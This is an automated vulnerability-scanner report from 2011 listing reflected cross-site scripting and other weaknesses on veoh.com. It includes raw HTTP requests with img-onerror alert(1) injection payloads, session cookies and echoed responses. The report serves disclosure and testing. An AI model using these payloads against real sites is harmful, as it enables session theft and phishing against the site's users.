XSS, veoh.com, Cross Site Scripting, CWE-79, CAPEC-86

XSS in veoh.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 09:20:43 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.veoh.com/browse/videos/category/action_adventure [REST URL parameter 4]

1.2. http://www.veoh.com/browse/videos/category/action_adventure [REST URL parameter 4]

1.3. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 4]

1.4. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 4]

1.5. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 6]

1.6. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 4]

1.7. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 4]

1.8. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5 [REST URL parameter 6]

1.9. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 4]

1.10. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 4]

1.11. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8 [REST URL parameter 6]

1.12. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 4]

1.13. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 4]

1.14. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 [REST URL parameter 6]

1.15. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 4]

1.16. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 4]

1.17. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 6]

1.18. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 4]

1.19. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 4]

1.20. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 6]

1.21. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 4]

1.22. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 4]

1.23. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 6]

1.24. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 4]

1.25. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 4]

1.26. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 6]

1.27. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 4]

1.28. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 4]

1.29. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 6]

1.30. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 4]

1.31. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 4]

1.32. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8 [REST URL parameter 6]

1.33. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 4]

1.34. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 4]

1.35. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt [REST URL parameter 6]

1.36. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 4]

1.37. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 4]

1.38. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB [REST URL parameter 6]

1.39. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 4]

1.40. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 4]

1.41. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS [REST URL parameter 6]

1.42. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 4]

1.43. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 4]

1.44. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz [REST URL parameter 6]

1.45. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr [REST URL parameter 6]

1.46. http://www.veoh.com/browse/videos/category/action_adventure4957f [REST URL parameter 4]

1.47. http://www.veoh.com/browse/videos/category/action_adventure4957f [REST URL parameter 4]

1.48. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') [REST URL parameter 4]

1.49. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') [REST URL parameter 4]

1.50. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a [REST URL parameter 4]

1.51. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 4]

1.52. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 4]

1.53. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 6]

1.54. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 4]

1.55. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 4]

1.56. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 6]

1.57. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 4]

1.58. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 4]

1.59. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ [REST URL parameter 6]

1.60. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 4]

1.61. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 4]

1.62. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ [REST URL parameter 6]

1.63. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 4]

1.64. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 4]

1.65. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP [REST URL parameter 6]

1.66. http://www.veoh.com/category/list/tab/groups [REST URL parameter 4]

1.67. http://www.veoh.com/category/list/tab/home [REST URL parameter 4]

1.68. http://www.veoh.com/category/list/tab/movies [REST URL parameter 4]

1.69. http://www.veoh.com/category/list/tab/music [REST URL parameter 4]

1.70. http://www.veoh.com/category/list/tab/tvshows [REST URL parameter 4]

1.71. http://www.veoh.com/category/list/tab/videos [REST URL parameter 4]

1.72. http://www.veoh.com/category/list/tab/webseries [REST URL parameter 4]

1.73. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]

1.74. http://www.veoh.com/search/videos/q/-MENUVALUE- [REST URL parameter 4]

1.75. http://www.veoh.com/search/videos/q/-MENUVALUE- [REST URL parameter 4]

1.76. http://www.veoh.com/search/videos/q/publisher:bunny12344 [REST URL parameter 4]

1.77. http://www.veoh.com/search/videos/q/publisher:bunny12344 [REST URL parameter 4]

1.78. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]

1.79. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]

1.80. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8 [User-Agent HTTP header]

2. Cleartext submission of password

2.1. http://www.veoh.com/favorites

2.2. http://www.veoh.com/login

2.3. http://www.veoh.com/messages/inbox

2.4. http://www.veoh.com/myinterests

2.5. http://www.veoh.com/myplaylists

2.6. http://www.veoh.com/myprofile/videos

2.7. http://www.veoh.com/publish/video

2.8. http://www.veoh.com/register

3. Session token in URL

4. Cookie scoped to parent domain

4.1. http://www.veoh.com/webplayed.xml

4.2. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

4.3. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

5. Cookie without HttpOnly flag set

5.1. http://www.veoh.com/rest/v2/execute.xml

5.2. http://www.veoh.com/webplayed.xml

5.3. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

5.4. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

6. Password field with autocomplete enabled

6.1. http://www.veoh.com/favorites

6.2. http://www.veoh.com/login

6.3. http://www.veoh.com/messages/inbox

6.4. http://www.veoh.com/myinterests

6.5. http://www.veoh.com/myplaylists

6.6. http://www.veoh.com/myprofile/videos

6.7. http://www.veoh.com/publish/video

6.8. http://www.veoh.com/register

7. Cross-domain Referer leakage

7.1. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

7.2. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

7.3. http://www.veoh.com/publish/video

8. Cross-domain script include

8.1. http://www.veoh.com/

8.2. http://www.veoh.com/browse/groups

8.3. http://www.veoh.com/browse/groups/

8.4. http://www.veoh.com/browse/movies

8.5. http://www.veoh.com/browse/movies/

8.6. http://www.veoh.com/browse/music

8.7. http://www.veoh.com/browse/music/

8.8. http://www.veoh.com/browse/tvshows

8.9. http://www.veoh.com/browse/tvshows/

8.10. http://www.veoh.com/browse/videos

8.11. http://www.veoh.com/browse/videos/category/action_adventure

8.12. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

8.13. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5

8.14. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8

8.15. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

8.16. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

8.17. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

8.18. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

8.19. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

8.20. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN

8.21. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC

8.22. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA

8.23. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

8.24. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8

8.25. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

8.26. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

8.27. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS

8.28. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz

8.29. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr

8.30. http://www.veoh.com/browse/videos/category/action_adventure4957f

8.31. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

8.32. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

8.33. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

8.34. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW

8.35. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

8.36. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

8.37. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

8.38. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

8.39. http://www.veoh.com/browse/webseries

8.40. http://www.veoh.com/browse/webseries/

8.41. http://www.veoh.com/browse/webseries/featured/1

8.42. http://www.veoh.com/bulletin

8.43. http://www.veoh.com/collection/Veoh-Editor-Picks

8.44. http://www.veoh.com/corporate/aboutus

8.45. http://www.veoh.com/corporate/copyright

8.46. http://www.veoh.com/corporate/pressroom

8.47. http://www.veoh.com/corporate/privacypolicy

8.48. http://www.veoh.com/corporate/termsofuse

8.49. http://www.veoh.com/download

8.50. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8

8.51. http://www.veoh.com/faq

8.52. http://www.veoh.com/favorites

8.53. http://www.veoh.com/help

8.54. http://www.veoh.com/login

8.55. http://www.veoh.com/messages/inbox

8.56. http://www.veoh.com/metrics/logadevent

8.57. http://www.veoh.com/myinterests

8.58. http://www.veoh.com/myplaylists

8.59. http://www.veoh.com/myprofile/videos

8.60. http://www.veoh.com/publish/video

8.61. http://www.veoh.com/register

8.62. http://www.veoh.com/search/videos/q/-MENUVALUE-

8.63. http://www.veoh.com/search/videos/q/publisher:bunny12344

8.64. http://www.veoh.com/support.html

8.65. http://www.veoh.com/users/JDFox5

8.66. http://www.veoh.com/users/MitchRider

8.67. http://www.veoh.com/users/Veoh-Action-Anime

8.68. http://www.veoh.com/users/Veoh-Horror-Movies

8.69. http://www.veoh.com/users/Veoh-Upcoming-Movies

8.70. http://www.veoh.com/users/bunny12344

8.71. http://www.veoh.com/users/tonysurfs

8.72. http://www.veoh.com/veohtv

8.73. http://www.veoh.com/video/conduit

8.74. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8

8.75. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8

8.76. http://www.veoh.com/xd_receiver.htm

9. Email addresses disclosed

9.1. http://www.veoh.com/

9.2. http://www.veoh.com/browse/groups

9.3. http://www.veoh.com/browse/groups/

9.4. http://www.veoh.com/browse/movies

9.5. http://www.veoh.com/browse/movies/

9.6. http://www.veoh.com/browse/music

9.7. http://www.veoh.com/browse/music/

9.8. http://www.veoh.com/browse/tvshows

9.9. http://www.veoh.com/browse/tvshows/

9.10. http://www.veoh.com/browse/videos

9.11. http://www.veoh.com/browse/videos/category/action_adventure

9.12. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

9.13. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5

9.14. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8

9.15. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

9.16. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

9.17. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN

9.18. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC

9.19. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA

9.20. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

9.21. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8

9.22. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

9.23. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

9.24. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS

9.25. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz

9.26. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr

9.27. http://www.veoh.com/browse/videos/category/action_adventure4957f

9.28. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

9.29. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

9.30. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW

9.31. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

9.32. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

9.33. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

9.34. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

9.35. http://www.veoh.com/browse/webseries

9.36. http://www.veoh.com/browse/webseries/

9.37. http://www.veoh.com/browse/webseries/featured/1

9.38. http://www.veoh.com/bulletin

9.39. http://www.veoh.com/collection/Veoh-Editor-Picks

9.40. http://www.veoh.com/corporate/aboutus

9.41. http://www.veoh.com/corporate/copyright

9.42. http://www.veoh.com/corporate/pressroom

9.43. http://www.veoh.com/corporate/privacypolicy

9.44. http://www.veoh.com/corporate/termsofuse

9.45. http://www.veoh.com/download

9.46. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8

9.47. http://www.veoh.com/faq

9.48. http://www.veoh.com/favorites

9.49. http://www.veoh.com/help

9.50. http://www.veoh.com/login

9.51. http://www.veoh.com/messages/inbox

9.52. http://www.veoh.com/metrics/logadevent

9.53. http://www.veoh.com/myinterests

9.54. http://www.veoh.com/myplaylists

9.55. http://www.veoh.com/myprofile/videos

9.56. http://www.veoh.com/publish/video

9.57. http://www.veoh.com/register

9.58. http://www.veoh.com/search/videos/q/-MENUVALUE-

9.59. http://www.veoh.com/search/videos/q/publisher:bunny12344

9.60. http://www.veoh.com/support.html

9.61. http://www.veoh.com/users/JDFox5

9.62. http://www.veoh.com/users/MitchRider

9.63. http://www.veoh.com/users/Veoh-Action-Anime

9.64. http://www.veoh.com/users/Veoh-Horror-Movies

9.65. http://www.veoh.com/users/Veoh-Upcoming-Movies

9.66. http://www.veoh.com/users/bunny12344

9.67. http://www.veoh.com/users/tonysurfs

9.68. http://www.veoh.com/veohtv

9.69. http://www.veoh.com/video/conduit

9.70. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8

9.71. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8



1. Cross-site scripting (reflected)  next
There are 80 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.veoh.com/browse/videos/category/action_adventure [REST URL parameter 4]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 was submitted in the REST URL parameter 4. This input was echoed as f4b0c<img src=a onerror=alert(1)>88040cf1d82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventuref4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:50 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 57783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref4b0c<img src=a onerror=alert(1)>88040cf1d82"}</textarea>
...[SNIP]...

1.2. http://www.veoh.com/browse/videos/category/action_adventure [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e was submitted in the REST URL parameter 4. This input was echoed as 9d235"><img src=a onerror=alert(1)>9e252f7871e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:46 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=59
Content-Length: 57827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure9d235"><img src=a onerror=alert(1)>9e252f7871e/sort/most viewed" selected="selected">
...[SNIP]...

1.3. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34 was submitted in the REST URL parameter 4. This input was echoed as 71e6c"><img src=a onerror=alert(1)>96f11e9dd34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34/watch/v18647177dJ8p2YBE HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=87
Content-Length: 77754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure71e6c"><img src=a onerror=alert(1)>96f11e9dd34/sort/most viewed" selected="selected">
...[SNIP]...

1.4. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22 was submitted in the REST URL parameter 4. This input was echoed as 8fa41<img src=a onerror=alert(1)>55c9c937f22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22/watch/v18647177dJ8p2YBE HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
